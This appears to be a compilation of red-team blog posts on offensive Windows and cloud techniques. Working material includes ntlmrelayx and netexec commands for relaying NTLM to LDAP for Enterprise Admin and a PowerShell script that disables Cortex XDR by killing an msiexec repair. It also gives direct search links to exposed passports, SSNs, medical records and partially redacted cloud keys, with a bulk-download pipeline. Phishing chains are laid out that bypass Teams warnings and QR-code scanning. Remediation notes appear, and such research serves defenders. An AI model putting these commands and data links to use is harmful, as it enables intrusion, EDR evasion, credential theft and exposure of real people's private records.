This is for sure nice, but if we just would want the hashes, we could have done this direct in the C# code like MDSec’s Farmer is doing here.

But the bigger / better part is quite often relaying!

Relay it

Let’s go a little bit through the relaying steps.

Start ntlmrelayx on the VPS

with proxychains and -smb2support. In this example, we are going to relay against the LDAP service, as it is still common to have no Channel binding and no LDAP Signing.

Relaying to LDAP is powerfull, but not the only choice. For example an interactive shell (-i) with ntlmrelayx against a fileshare or some HTTP endpoint is also great

proxychains sudo ntlmrelayx.py -debug -smb2support -t "LDAP://10.3.10.12" --escalate-user domainuser --http-port 80

Create the SSH tunnel on the client

with the two different port forwardings

ssh -L 10.3.10.12:8080:10.3.10.11:80 -R 127.0.0.1:9050 debian@10.3.10.11

Start the ProxyApp on the client

which registers at HTTP.SYS and will forward the request to port 8080 locally

Drop a .searchConnectors-ms file on the victim system

to ensure that the WebClient is running

Drop a .lnk file on the victim system

to actually coerce the authentication to our client

nxc smb 10.3.10.21 -d "ludus" -u "localadmin" -p "password" -M slinky -o NAME='\\users\\public\\desktop\\SHARE62' SERVER="elastic-elastic-dc01@10247\apps"

Note: The slightly strange parameters just make it to C:\users\public\desktop\Share63.lnk and \\elastic-elastic-dc01@10247\apps. I might make the PR for nxc in a while to clean this a little bit.

And Ta-da, this actually made us an Enterprise Admin.

Sucessful relaying

The flow looks like this: Attack flow

PoC

“Quick” Walkthrough

Bonus

I know this was a lengthy post, but you almost made it. As you kept scrolling until here, there is a little bonus. You can also coerce via embedded <img> tags in emails. Outlook will happily authenticate it against a network path if:

• The target system is in the trusted zone, typically meaning without a “.” in the name
• The sender of the email is a trusted sender.

All emails coming from the same domain are typically trusted senders, so if you got a trainee account, you are a trusted sender for the domain admin :)

Bonus PoC Walkthrough

Remediation

• Harden the firewall config
• Harden LDAP (Channel Bindung / Signing)
• Ensure SMB Signing is enforced
• Remove all those ESC8’s
• Never ever use high priv accounts to get e-mails!

TL;DR;

• Trigger the repair via GUID
• Disrupt it when EDR is deactivated
• Done

Details

Palo Alto’s Cortex XDR is often installed as a msi for windows systems. By triggering the repair function, which is possible as non-administrative user, we can initiate a repair running as NT-SYSTEM.

During the repari process the XDR is temporary (around 60s) disabled, which makes sense, as the repair needs to replace some files which otherwise would be in use.

In this time an attacker could start malicious processes or do other undetected things.

Furthermore, if the repair function is disrupted by killing the msiexec process the Cortex XDR will stay disabled, even after reboots until the repair function is triggered another time without interruption.

The PoC was tested against Cortex XDR 8.1.1.4337.

This is only working if the tamper protection is not enforced

PoC

Write-host "Try to get GUID"

$installed = Get-WmiObject Win32_Product
$string= $installed | select-string -pattern "Cortex"

Write-host "Found $string"

$string[0] -match '{\w{8}-\w{4}-\w{4}-\w{4}-\w{12}}'

Write-host "$string[0]"
Write-host "Found GUID $($matches[0].toString())"
Write-host "Starting the repair $($matches[0].toString())"
Start-Process -FilePath "msiexec.exe" -ArgumentList "/fa $($matches[0])"

Write-Host "Wait until XDR is deactivated and press [ENTER]"
Read-Host

taskkill /F /IM msiexec.exe
Start-Sleep 2
taskkill /F /IM msiexec.exe

Write-Host "If worked, EDR is permanent broken, at least until the repair is started again with : `n Start-Process -FilePath `"msiexec.exe`" -ArgumentList `"/fa $($matches[0])`""

Short PoC

Here is a quick video showcasing deactivation of the XDR, from a low priv user, downloading and executing a fresh release of mimikatz from github.

Palo Alto

I reported the vuln to Palo Alto, at least I would say this is a vulnerability as it clearly passes some fences. Palo Alto responded, that this is by design and the “decision” of the administrator, if the tamper protection is not enabled.

I do not fully agree here, as if a user can not install a stupid game like candy crush on his laptop, he should also not be capable to deactivate the EDR/XDR!

And there might also be some cases, where the tamper protection will not come in handy, for example if updates for the XDR should come over Software Distribution (like SCCM, Empirum, DSM, …) for whatever reasons.

But hey, not my decision. And as this is not the standard, I want to highlight this: the response from Palo Alto came quick, was friendly and with some details. Nice!

Remediation

Enable the tamper protection and make sure to monitor msi repair calls from low privileged users.

Some of keys or tokens would have allowed a complete organization takeover! As still a lot companies do not have a cost limit in cloud providers an attacker can cause a lot of damage.

To identify most of the stuff, we are almost exclusevly using https://grayhatwarfare.com/

Exposed sensitive data everywhere

Motivation

This is not a new issue and around a long time. I am providing most of the search links and also only redact the most critical things, as the typical reader here should be able to restore this within seconds and as I respect our time the links are included.

It is very difficult to report this stuff as the owner is in most cases not clear. And breaching an AWS org, to get the billing address might be a little bit out of scope.

I came up with the idea to abuse the github secret scanner to at least invalidate leaked api keys by simply uploading it to github. Regarding this blogpost: https://xebia.com/blog/what-happens-when-you-leak-aws-credentials-and-how-aws-minimizes-the-damage/ AWS will add a policy to the leaked user. However this still does not block access to all ressources immediatly and therefore it is not sufficant to report leaked keys, as I would just collect them for others…
If anybody knows a way to securely report leaked API Keys, please let me know

The following chapters will be a sample gallery of what stuff can be found a biref explaination why it shouldn’t be there. Keep in mind that this is always only a small amount of the stuff which can be found.

It is important to mention, that not all things which can be found are still valid or also might also be honeycreds, or otherwise heavily monitored

Private Stuff

Let’s start with the privacy relevant stuff.

responsible handling of data

Outlook accounts and emails (pst, eml, msg)

https://buckets.grayhatwarfare.com/files?fullpath=1&extensions=pst%2Cost&order=last_modified&direction=desc

PST files can be imported in Outlook and can be complete Email accounts.

Outlook Accounts

Outlook Accounts imported

The same goes for msg and eml files, which are a single email. Why do you backup a single email? Because it is important …

Passports

Personalausweise (German / Austrian ID Cards)

https://buckets.grayhatwarfare.com/files?keywords=personalausweis&extensions=pdf,png,jpg,jpeg&order=last_modified&direction=desc&page=1

Saving Passports and ID documents is illegal in several countries.

German ID Page front and back

Austrian ID

Other

Passport #1

Passport #2

Certificate of Birth

https://buckets.grayhatwarfare.com/files?keywords=certificate+birth&extensions=pdf%2Cpng%2Cjpg%2Cjpeg&order=last_modified&direction=desc

Indian birth certificate

Puerto Rico birth certificate

SSNs

https://buckets.grayhatwarfare.com/files?keywords=ssn&fullpath=1&extensions=pdf,png,jpg,jpeg&order=last_modified&direction=desc&page=1

Some US Social Security Numbers…

SSN #1

SSN2 #2

Prescriptions

https://buckets.grayhatwarfare.com/files?keywords=prescription&fullpath=1&extensions=pdf%2Cpng%2Cjpg%2Cjpeg&order=last_modified&direction=desc

Medical data and prescriptions Prescriptions

It seems that there is quite a big bunch of company data available, including video call recordings, prescriptions, medical records, …

https://buckets.grayhatwarfare.com/files?bucket=telehealth-assets.s3.amazonaws.com&page=4&order=size&direction=desc

Medical data

Bills and customer data

Of course there are also bills and customer data directly availible. This is ofc bad, but it gets worse when it comes to database dumps.

Customer data

Polices

https://buckets.grayhatwarfare.com/files?keywords=versicherung&fullpath=1&extensions=pdf,png,jpg,jpeg&order=last_modified&direction=desc&page=1 insurance policies

Licenses and stuff

There are also a lot of license files and keys available. For example, a Windows Server 2016 from an unattended.xml.

unattended.xml with some passwords and a Windows Server key

Key is valid

Another one, with additional domain join credentials

Credentials

When it comes to credentials it is just a matter of finding juicy files. It is possible to get some inspiration from tools like Snaffler, which does an excellent job in finding secrets OnPrem.

Default file names with credentials

AWS - credential.csv

https://buckets.grayhatwarfare.com/files?keywords=credentials&extensions=csv&order=last_modified&direction=desc&page=1

If a new IAM user is added in AWS, a credentials.csv file will be generated with the credentials.

CSV files as build when adding an IAM user in AWS

Sample

AWS credentials

A quick look by my friendo personal AWS Magician @rootcathacking, as i have no glue about AWS, revealed that the IAM roles are wrongly configured and the complete organization could get compromised.
If you want some deeper random AWS knowledge, visit his blog: https://rootcat.de/blog/

Personal AWS Magician

Of course, they are working and a complete Organization could get compromized

AWS Keys

https://buckets.grayhatwarfare.com/files?keywords=creds&fullpath=1&extensions=txt&order=last_modified&direction=desc

AWS credentials

But those credentials are for sure invalid or? Sure…

Bucket listing

Another set
Just another set

AWS SMTP Creentials
AWS SMTP Credentials

s3conf

Extension for mounting a S3 Bucket

Azure Token

I also found a bunch of Azure service accounts, e.g. for the blob service. To verify those credentials we can use Azure CLI and query it like this.

az storage share list --account-name "frowt######" --account-key "YfCL+0LjmmtdJ92BMZJHpTbeO+BB0n0tIdy+bvOE5xiJuMUG2ItHFyNou1ehl75u4p######################"

az storage file list --share-name "assets-dev" --account-name "frowt######" --account-key "YfCL+0LjmmtdJ92BMZJHpTbeO+BB0n0tIdy+bvOE5xiJuMUG2ItHFyNou1ehl75u4p######################""

Valid Blob credentials for Azure

Google Cloud

https://buckets.grayhatwarfare.com/files?keywords=gha%20creds&extensions=json&order=last_modified&direction=desc&excludedBuckets=&page=1

We can for example search for gha-creds.json files. Those files hold Google Cloud Service Account token.

Google cloud credentials

The gcp_scanner is really handy, if you want to enumerate a token and it’s access.
And ofc we again get some valid tokens…

Valid credentials and a report from the gcp scanner

CSCFG - Azure Cloud Services (classic) Config Schema

https://buckets.grayhatwarfare.com/files?fullpath=1&extensions=cscfg,tfvars&order=last_modified&direction=desc&page=1

Those cscfg files hold a crazy amount of different credentials. Most but not all credentials are related to Azure ressources.

cscfg file sample #1

cscfg file sample #2

Certificates

https://buckets.grayhatwarfare.com/files?fullpath=1&extensions=pfx%2Cp12&order=last_modified&direction=desc

Over 30k hits for .pfx and .p12 certificates. Why those two types? In contriary to .der, .pem, .key files we know the purpose and mostly an url for those certificates. If we get a private certificate or key, it is nice, but quite useless if we do not know where to use …

30k certificates

Generally, it would be possible to try some passwords for the certificates and there might be some interesting ones.

Most of the certificates with a weak password are for Client Authentication and Secure Email, e.g. for SMIME.

We can easily get over 200 valid! certificates, like this one.

Typical securemail and identity certificate

CA chain

There are some other quite interesting certificates, e.g. Code Signing for Apple Developers.

kligo-cert.p12         PW: #####
Code Signing (1.3.6.1.5.5.7.3.3)
01/02/2027
False
C=US, O=Apple Inc., OU=Apple Certification Authority, CN=Developer ID Certification Authority

PS > $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2
PS > $cert.Import("$pwd\kligo-cert.p12",'#####','DefaultKeySet') 
PS > $cert.ToString()
[Subject]
  C=US, O=Medeo, OU=5TJZ8J82S5, CN=Developer ID Application: Medeo (5TJZ8J82S5), OID.0.9.2342.19200300.100.1.1=5TJZ8J82S5
[Issuer]
  C=US, O=Apple Inc., OU=Apple Certification Authority, CN=Developer ID Certification Authority
[Serial Number]
  67D5A56F672A53C9
[Not Before]
  04/07/2023 14:36:04
[Not After]
  01/02/2027 23:12:15
[Thumbprint]
  5467E477BAC46A3E8E83A8BDBB18A24F48B13595

Code Signing certificate

Remote Tools

Winscp

https://buckets.grayhatwarfare.com/files?keywords=winscp&extensions=ini%2Ctxt%2Cconfig&order=last_modified&direction=desc

WinSCP search

WinSCP config files are well known to be insecure encrypted, meaning it is possible to simply restore the passwords…

WinSCP sample

Another WinSCP sample

FileZilla

https://buckets.grayhatwarfare.com/files?keywords=filezilla&extensions=ini%2Ctxt%2Cconfig%2Cxml&order=last_modified&direction=desc

<Pass encoding="base64"> I guess you can see where this is going

FileZilla sample

FileZilla sample #2

Sublime

https://buckets.grayhatwarfare.com/files?keywords=%27sftp-config%27&fullpath=1&extensions=xml%2Cjson&order=last_modified&direction=desc

The config for sublime does sometimes hold sftp credentials.

Sublime sample #1

Sublime sample #2

Password Manager

https://buckets.grayhatwarfare.com/files?fullpath=1&extensions=kdb,psafe3,kdbx,kwallet,agilekeychain,cred&order=last_modified&direction=desc&page=1

Some people make their own extensions for files, like .pass or .creds and then store their credentials in cleartext inside. Additional there are some keepass databases which can be found, however this would make it necessary to crack the master password, which is no fun as it is really slow.

Sample for a selfmade password “safe”

VPN

https://buckets.grayhatwarfare.com/files?fullpath=1&extensions=rdg%2Crtsz%2Crtsx%2Covpn%2Ctvopt%2Csdtid&order=last_modified&direction=desc

OpenVPN config files are interesting, as some of them do not require a user-pass-authentication. This would allow it to connect to the VPN…

Sampe ovpn config without user-pass-authentication

Other

https://buckets.grayhatwarfare.com/files?keywords=zugangsdaten&fullpath=1&order=last_modified&direction=desc

Some companies also store their ticket data in the buckets and there might be juicy information inside.

Credentials for a ISP Portal #1

Credentials for a ISP Portal #2

Software configurations

Gitlab

https://buckets.grayhatwarfare.com/files?keywords=gitlab&fullpath=1&extensions=rb&order=last_modified&direction=desc

Gitlab config files might also be juicy, as there is typically an SMTP configured.

Gitlab config

config.php

https://buckets.grayhatwarfare.com/files?keywords=config&extensions=php&order=last_modified&direction=desc&page=1

Not really a surprise, PHP config files are crazy and a lot of credentials can be found.

PHP Config #1

PHP Config #2

Backups

There are also complete Backups public availible, sometimes with a size of several Terrabyte. Of course they still might be encrypted, but yeah, let’s keep the hope.

Can’t loose the backup if it’s public available

Virtual disks

https://buckets.grayhatwarfare.com/files?extensions=vhd%2Cvhdx%2Cvmdk&order=last_modified&direction=desc

Virtual disks found

Virtual disks can easily be openend with 7zip.
Openend virtual disk

Browsing the backup

Mailstore is a solution for email archives, so this might not be good.

IMG files

The same goes for IMG files, they often also serve as backup. IMG files

Veeam & Acronis Backups

https://buckets.grayhatwarfare.com/files?extensions=vbk,tib&order=last_modified&direction=desc

Veeam & Acronis Backups are normally password protected. But if the password can be cracked, this will mostly be juicy.

Forensic Images

https://buckets.grayhatwarfare.com/files?fullpath=1&extensions=e01&order=last_modified&direction=desc&page=1

Forensic Images are full disc images, used during incident response. With the correct tools, they can be openend. There are for example the forensic tools for 7zip.

Archive files

https://buckets.grayhatwarfare.com/files?keywords=backup&fullpath=1&extensions=zip,7z,tar,gz2,rar&order=last_modified&direction=desc&page=1

A lot of data available

SQL

https://buckets.grayhatwarfare.com/files?extensions=bak&order=size&direction=desc&page=1

SQL backups are crazy, as they might leak complete application data including usercredentials and also payment data. And there are a lot of files…

BAK files server typically as MSSQL backups

MySQL Dumps

MySQL dumps also contain the complete data.

MySQL dumps as backup

BSON files

https://buckets.grayhatwarfare.com/files?fullpath=1&extensions=bson&order=last_modified&direction=desc&page=1

Binary JSON files can also be used as backup and there some with quite interesting data.

BSON file with tokens for Firebase

Scripts

Also no surprise, we can find a lot of the typical credentials in script files like vbs, cmd, bat , ps1, sh. The difficult thing here is to find a name which might contain credentials, as we can not grep through the files without downloading.

https://buckets.grayhatwarfare.com/files?keywords=ftp&fullpath=1&extensions=ps1,sh,vbs,cmd&order=last_modified&direction=desc&page=1

Bash script with credentials

Bash script with credentials

Bash script with AWS credentials

Powershell script with credentials

Excourse 1: Scraping data easily with Excel

Excel nowadays offers a nice feature for quickly gathering data from a webservice. Let’s say, we want to perform some checks on ourself for S3 buckets and therefore want a list.

https://buckets.grayhatwarfare.com/buckets?type=aws

List of buckets

We can now easily import this data in excel with a query.

Import Data from web

Select the data you want

Done

But wait, now we only have the first page of data …
Easy!

Adjust the Query

let
    // Define a function to get data for a specific page
    GetDataForPage = (page) =>
        let
            Source = Web.Page(Web.Contents("https://buckets.grayhatwarfare.com/buckets?type=aws&page=" & Text.From(page))),
            Data0 = Source{0}[Data],
            #"Changed Type" = Table.TransformColumnTypes(Data0,{{"#", Int64.Type}, {"Bucket", type text}, {"Files", Int64.Type}, {"Container", type text}})
        in
            #"Changed Type",

    // Use List.Generate to create a list of data for pages 1 to 50
    Pages = List.Generate(() => 1, each _ <= 50, each _ + 1),
    
    // Use Table.Combine to combine the data for all pages
    CombinedData = Table.Combine(List.Transform(Pages, GetDataForPage))
in
    CombinedData

Now we crawl 50 pages or 1000 rows.

1000 rows within 50 requests crawled

This is not a rate limit bypass, meaning if you run into this issue, you need to tamper this a little more, maybe catspin or fireprox!

Excourse 2: AWS key validation

Check if the credentials are still valid.

root@ ~ [1]# aws configure --profile tmp
AWS Access Key ID [None]: AKIAIUH2AI65LLS3Y###
AWS Secret Access Key [None]: rINcfgU63NBUFaFJFP3kO9cR4sVX############
Default region name [None]: ap-south-1
Default output format [None]:
root@ ~# aws sts get-caller-identity --profile tmp
{
    "UserId": "AIDAJLSWOFPMWAJPP5S36",
    "Account": "140444460056",
    "Arn": "arn:aws:iam::140444460056:user/chetan.awate"
}
root@ ~# aws s3 ls --profile tmp
2022-12-14 12:54:34 63moons-map-migrated
2022-12-14 12:55:14 a-presto-test-bucket-1
2022-12-14 12:55:46 amplify-myamplifytest-dev-163751-deployment
2022-12-14 12:56:15 astha-wfh-ec2
2022-12-14 12:56:45 astha-wfh-ec2-prod-serverlessdeploymentbucket-crtvtwylvb7o
[...]
2022-12-14 15:52:07 wave2-binaries
2022-12-14 15:52:10 zohobucket1
root@ ~# aws ec2 describe-instances --profile tmp
{
    "Reservations": [
        {
            "Groups": [],
            "Instances": [
                {
                    "AmiLaunchIndex": 0,
                    "ImageId": "ami-7d5f2412",
                    "InstanceId": "i-0280648b8540ccbc0",
                    "InstanceType": "t2.medium",
                    "KeyName": "asterisk_server",
                    "LaunchTime": "2022-02-03T05:53:46.000Z",
                    "Monitoring": {
                        "State": "disabled"
                    },
                    "Placement": {
                        "AvailabilityZone": "ap-south-1a",
                        "GroupName": "",
                        "Tenancy": "default"
                    },
                    "PrivateDnsName": "ip-172-31-23-174.ap-south-1.compute.internal",
                    "PrivateIpAddress": "172.31.23.174",
                    [...]

Excourse 3: Download snippet

During my search it was quite nice to simply download a batch of files. A command for this might look like this. And yeah, there is quite a lot of space for improvements, but hey it should be working!

curl --request GET \
 --url 'https://buckets.grayhatwarfare.com/api/v2/files?keywords=winscp&order=last_modified&direction=desc&extensions=ini&start=0&limit=100'  \ 
 --header 'Authorization: Bearer ###########' \ 
 | jq | grep "url" | cut -d ":" -f 2- \ 
 | sed 's/,//g' | xargs -i wget --no-check-certificate {} 

Finally after several months and a “very smooth communication”, meaning 4 month of nothing from Microsoft, they patched the External Participant Bypass via Meeting invitations. As this was always a great vector for spearfishing during RedTeaming assesments, I clicked a little bit around in Teams and Mild shock this is not bulletproof.

tl;dr

The splash screen can be bypassed again in at least one simple way (and I still bet there are more). There is a caveat as this will not enable chatting with the user, only one-way communication.

• Create a group chat
• Invite the external “victim”
• Write your message
• Splash screen will be shown to the user
• Remove the user from participants
• Splash screen will also be removed

The splash screen will be bypassed. Victim View: Bypassing the Splashscreen

Details

• Create a group chat

• Invite the external “victim” Attacker View: Invite the victim(s)

Bonus

You can also rename the groupchat to whatever you want. So why not a nice email adress like AccountServices@victim.org. Attacker View: Change the chat description

• Write your message

• Splash screen will be shown to the user Victim View: Splashscreen shown

• Remove the user from participants Attacker View: Remove the User

• Splash screen will also be removed Victim View: Bypassing the Splashscreen

There is a limitation, as the victim can not reply to us. We can still send new messages, by adding them and removing again but the limitation keeps. This must be considered in the phishing context.

Bonus

This is also working with files

Victim View: File “received”, basically it’s just a sharepoint link

PoC

Here a small PoC from the victim view. We can of course do all the actions quick by just replaying stuff to the API, so the user will only see the final result, meaning a message where he can not answer.

Quick Walkthrough, victim view

Conclusion

And again there is a (partly) bypass of the splash screen. Imho disabling the “external collaboration” or at least limit it to trusted domains is still the best option.

Check your settings

Links

• https://badoption.eu/blog/2023/09/27/teams4.html

As protections for endpoints (Laptops, Virtual-Desktops, …) are getting better and sometimes really tough to bypass, it might be time to move along. One of the next weaker devices might be mobile ones, in that case smartphones. Imho the MDM is weaker nowadays then a fully featured EDR with webproxies and packet inspection.

For a good user experience, we can combine “E-Mails, QR-Codes, DeviceCode phishing and Azure CDN fronting”.

tl;dr

• E-Mails without links, attachments and images will often make it to inbox
• QRCodes do not need to be images, they can also be Unicode or html tables
• Azure CDN Fronting spares the handling of a trusted domain, SSL certificate and all the nasty things around
• DeviceCode phishing is still doing great in most environments
• A GraphAPI token for Azure is quite powerful
• Depending on the kind of phishing the loot might be even a fully featured PRT!

Introduction

When targeting mobile devices, it might not be the best idea to just phish credentials, as most of the time people will not type them in, because it is just annoying to do so. Another problem is MFA and passwordless logins. Of course, you can also use things like VNC phishing or full transparent proxies (evilginx), but those things are mostly difficult to setup, as a lot of protections are in place nowadays.

Another problem is, how to ensure, that the link / payload is executed on a mobile device.

Why

Mobile devices are typically joined to the O365 environment, if existing ofc, because employees should get emails and teams messages outside the office. If there is also a browser logged in, which is quite often the case, as links to documents e.g. via Teams will be opened in the browser at first, the chances of having a DeviceCode Phishing without the user need to enter his credentials are quite high.

Of course, there are a lot of ways to harden the Azure environments and also the devices itself, but this risk is always present from attacker perspective.

Build it

Sending an email

To send an email, we can simply rely on a Azure developer tenant. Details can be found here: https://badoption.eu/blog/2023/12/03/PhishingInfra.html

PS: MSRC stated, that it might not be good that emails can be send from the developer tenants, but the “risk is below the bar for immediately servicing”, so I guess we can use this for a while Ooooookay

Another ways to get some emails in the inbox might be:

• DirectSend, a Microsoft “Feature” to send emails from e.g. scanning devices
  https://www.blackhillsinfosec.com/spamming-microsoft-365-like-its-1995/
  https://www.blackhillsinfosec.com/spoofing-microsoft-365-like-its-1995/

• Use a third-party email-provider like mailgun

• Spoof the sender and deliver it directly to the victims MX server via SMTP

What to send

When targeting mobile devices a good question is what to send. Malicious apps sound way better then they are, as a MDM managed device will not be able to install. 1-click 0-day exploits? Sure, nice, if you have one, but I guess you might not burn that for a Red Teaming.

The idea for this post is to send a QR code to the victim, which it will hopefully then open on it’s working client and scan with the smartphone.

QRCode in a HTML message rendered in Outlook

What happens when that link is opened? Using a tool like https://github.com/secureworks/squarephish we can either send a second mail to the victim or show a code for device code phishing directly on the browser. It depends on the customer, which version is better, if you want to use O365 to send the initial email it is really annoying to connect squarephish to it. O365 does not support SMTP anymore and a lot of stuff simply seems broken / obsolete at that point.

For our PoC we are going to use a webpage in the layout of the MS Authenticator as most people are used to it by now. The adjustments to deliver a webpage with the flask server of squarephish are minimal. Just return a template with same variables, like this:

#       if not emailed:
#           logging.error(f"[{target_email}] Failed to send victim device code email")

       #return DeviceCode_response["user_code"]
       return render_template('DeviceCode_email.html', code=DeviceCode_response["user_code"]) """

Be creative for the rendered page, a quite simple and lazy example might be:

Landingpage

Further improvements would to change the parameter names and values, e.g. from the cleartext email to something non-obvious like base32 or base56.

How to build

MS recently started to detect links and QR codes in general, but it seems that they are only scanning in attachments and images embedded in the message.
https://techcommunity.microsoft.com/t5/microsoft-defender-for-office/protect-your-organizations-against-qr-code-phishing-with/ba-p/4007041

So how could we bypass this? Who said, that a QR Code must be an image, it is just a bunch of squares in black and white.

qrencode -o - "https://msrc.microsoft.com" -l H -t UTF8
█████████████████████████████████████████
█████████████████████████████████████████
████ ▄▄▄▄▄ █ ▀▄█ ██▀ ▀▀▀▄▀█▄ █ ▄▄▄▄▄ ████
████ █   █ █▄█ ▄▄ ▀ ████ ▄  ▄█ █   █ ████
████ █▄▄▄█ █▀▄█▀ ▄▀█▄▄▀██▄██▄█ █▄▄▄█ ████
████▄▄▄▄▄▄▄█ ▀▄█▄█ █ █ ▀ ▀ █ █▄▄▄▄▄▄▄████
████▀█   ▀▄█▄ █▄█ █ █ ████▄▀▄  ▄█▀▄  ████
███████ █▄▄ ▄▄█ ▀▄▄▀  ▀▄ █▄▀▄▀▀▄█ ▀ █████
████▀█▀▄█ ▄▄ ▀   ▄▀▀█ █  ▄▄ ▄█▀▄▀ █▄ ████
██████▀█▀█▄   ▀█▀  ▄▀█▀ ▀▀ ██▄▀▄ ▀█▄▀████
████▄▄█▀█▄▄█▀ ▀█  ▄█ ▄▄▀▀▀█ ▀ ▀▄▄█▄█▄████
████▄ █ █▀▄▄▄▄▄▄▀ █▀▀▀▀▄▀▀▀▀▀▀██ ▀ ▀█████
████ ▄▀▄▄█▄█▄▄▄  ▀ ████▀██ █▄▀█▄▄▄▀▄ ████
████ █▄  █▄ ▄▀▄▄▀█ ██   ▄▀  ▄██ ▄ ▀▄▀████
████▄█▄█▄▄▄▄  ▀▀  █▀█▀▄▀ ▀▄▄ ▄▄▄ ▄▀█▀████
████ ▄▄▄▄▄ ███ ▄▄ ▀ ▄▀▄▀█ ▀▄ █▄█  ▀ ▀████
████ █   █ █  █▄▄▄ ▄▀▀██ ▄▀█  ▄▄ █▀ ▄████
████ █▄▄▄█ █▄▀▀  ▀▀▀█▀▄  █▄▄▄  ▀█▄ ██████
████▄▄▄▄▄▄▄██▄▄▄▄▄█████▄█▄▄▄▄█▄██▄▄▄█████
█████████████████████████████████████████
█████████████████████████████████████████

Even with the line distance in markdown the QRCodes are easily scanable

You can either go for the plain text message here, or if you use HTML the layout can be further improved. The results with a Monospace font and font size of 8 looks quite good Outlook. If you go for HTML, you should ensure, that you layout keeps intact, e.g. if you have multiple Spaces in a row they might get truncated, which of course breaks the QRCode. Easy fix: Replace “ “ with “&NBSP;”

qrencode -o - "https://msrc.microsoft.com" -l H -t UTF8| sed 's/ /\&nbsp;/g' | sed -e 's/^/    <div style="direction: ltr; margin: 0cm;"><span style="font-family: \&quot;Courier New\&quot;; font-size: 8pt; color: rgb(0, 0, 0); white-space: pre-wrap;">/' -e 's/$/<\/span><\/div>/'
<div style="direction: ltr; margin: 0cm;"><span style="font-family: &quot;Courier New&quot;; font-size: 8pt; color: rgb(0, 0, 0); white-space: pre-wrap;">█████████████████████████████████████████</span></div>
...

QRCode shown by Firefox

Another great advantage of not having the QR code as picture is, that typically pictures are not shown immediately to prevent tracking and to respect some privacy. So we are also sailing around this protection as we typically have no interest in the tracking mechanism.

Device Code phishing

We can go with some “normal” DeviceCode phishing for a Graph-API token and then use it to exfiltrate stuff, e.g. with the great GraphRunner https://github.com/dafthack/GraphRunner or we customize our server to go for a Primary-Refresh-Token (PRT) with the absolute great technique from here: https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/. One of the biggest advantages of the PRT is quite unlimited access to Azure resources but also a long lifetime, typically > 30 days.

There is a working PoC available here: https://github.com/kiwids0220/DeviceCode2WinHello
Note: This technique uses device registration, which can be blocked in the victim’s tenant, but mostly isn’t

It is a little bit tricky to setup with squarefish, a not beautiful but working way is to just call the python script asynchronous from the flask server, write the output to a file and deliver the DevicePhishingCode to the victim. Keep in mind, that the MS API is getting polled after that, so ensure that the script continues running.

Protect the landingpage

To protect the landingpage we can use Azure CDN Classic. It allows us to choose a subdomain for “.azureedge.net”, costs typically only a few cents, comes with a Microsoft signed SSL certificate and is trusted by the most web proxies.

This wonderful certificate is used and trusted by most webproxies

We can then either host the real server also in Azure, use some serverless functions, or take anything else. A way to go is to just spawn a VPS and point there from the CDN. Remember to narrow the access directly to the VPS, all traffic should come from the CDN

The setup is really simple, just remember to turn of compression and the cache. Another great feature is, that the CDN can filter for geolocations, user agents, cookies and all those stuff, via an easy to configure webinterface.

CDN settings can be easily adjusted

PoC

So our final flow is:

• Use an Azure dev tenant to send an email with an “spoofed” sender
• embed a QR code as Unicode
• The QR code is pointing to a DeviceCode phishing server, customized squarefish in this case
• The landing page is protected by an AZURE CDN, filtering the user agent
• If the victim falls for the DeviceCode phishing, and we can register a device, we get a fully featured PRT!
• With the PRT we can e.g. use RoadTools to start a browser instance or do other enumeration stuff.
• Play with your token, a PRT can be transformed to almost everything else

There might be a PoC video in the nearer future

Conclusion

Phishing mobile devices might be an effective way to get access to Azure and the O365 part. Microsoft started to counter those attacks with QR-Codes getting scanned but it seems that there is still a lot of improvements. And also the Defender for Office O365 is not available for everyone.

As usual, if you want to discuss stuff, have some remarks or additions feel free to contact me on Twitter (it will always stay twitter not X…) PfiatDe

Countermeasures and indicators

• Turn off external collaboration for unknown domains / tenants.
• Block @onmicrosoft.com messages, despite your own tenant. This might have some unwanted side effects.
• Prevent normal users from registering and joining a device
• Block the DeviceCode login via Conditional Access, unfortunately disabling it is not possible by a simple way
• Prevent access to the GraphAPI

Links

Work and inspiration from others:

• https://badoption.eu/blog/2023/12/03/PhishingInfra.html
• https://www.blackhillsinfosec.com/spamming-microsoft-365-like-its-1995
• https://www.blackhillsinfosec.com/spoofing-microsoft-365-like-its-1995
• https://github.com/secureworks/squarephish
• https://github.com/dafthack/GraphRunner
• https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens
• https://github.com/kiwids0220/deviceCode2WinHello
• https://github.com/dirkjanm/ROADtools
• https://github.com/dirkjanm/ROADtools/wiki/ROADtools-Token-eXchange-(roadtx)#primary-refresh-tokens-prts

Some programs still do not apply Mark-of-the-Web (MotW), so we can build an, for the victim quite annoying chain involving custom protocol header, Windows search, WebDAV and Java or some other techniques for the final kick.
This results in a Zero Warning, yet several clicks, chain for initial access.

tl;dr

• “microsoft-edge:” is a protocol provider to open URLs in Edge
• “search-ms”: is a protocol provider to open Paths in explorer via the search function
• WebDAV supports search-ms
• Java does not honour MotW from WebDAV
• Python does not honour MotW from WebDAV
• Ruby does not honour MotW from WebDAV
• Visual Studio does not honour MotW from WebDAV and will execute a .suo file on project open

Looking at the pieces

To build the chain, we need to look at several smaller pieces.

WebDAV

We will need a simple WebDAV Server, so we can either stick to the Apache integration, or simply use wsgidav.

wsgidav --port=80 --host=0.0.0.0 --root=. --auth=anonymous

Be aware, that this allows anonymous R/W access, nice for testing, bad for internet facing systems

On the WebDAV we will host some files, more about that later. Connecting to a WebDAV server

The WebDAV protocol is quite firewall friendly, as everything is running over HTTP and also the typical mechanism like SSL/TLS are in place. Blocking WebDAV in a firewall is more complex than it looks in first place.

protocol handler

We can have either a look at the system settings to get a limited, or under the registry to get a complete overview of registered protocol handlers. There are quite some surprising ones, like the ms-word or other office stuff. Some details about can be found here:
https://badoption.eu/blog/2022/01/31/office_handler.html

Get-Item Registry::HKEY_CLASSES_ROOT\ms-* | Out-String | select-string -Pattern "URL" -SimpleMatch

will show all MS handlers registering an URL. This means, we can build an URL with identifier://URL and the windows system will call the registered application to handle it.

PS C:\> Get-Item Registry::HKEY_CLASSES_ROOT\search-ms | Out-String | select-string -Pattern "URL" -SimpleMatch

    Hive: HKEY_CLASSES_ROOT
Name                           Property                                                                                                                                  
----                           --------                                                                                                                                  
search-ms                      (default)        : Windows Search Protocol                                                                                                
                               FriendlyTypeName : @C:\Windows\explorer.exe,-6010                                                                                         
                               URL Protocol     :                                                                                                                  

Note: Not all browsers support all URLs, for example, Firefox will not interpret search-ms.

Search-MS

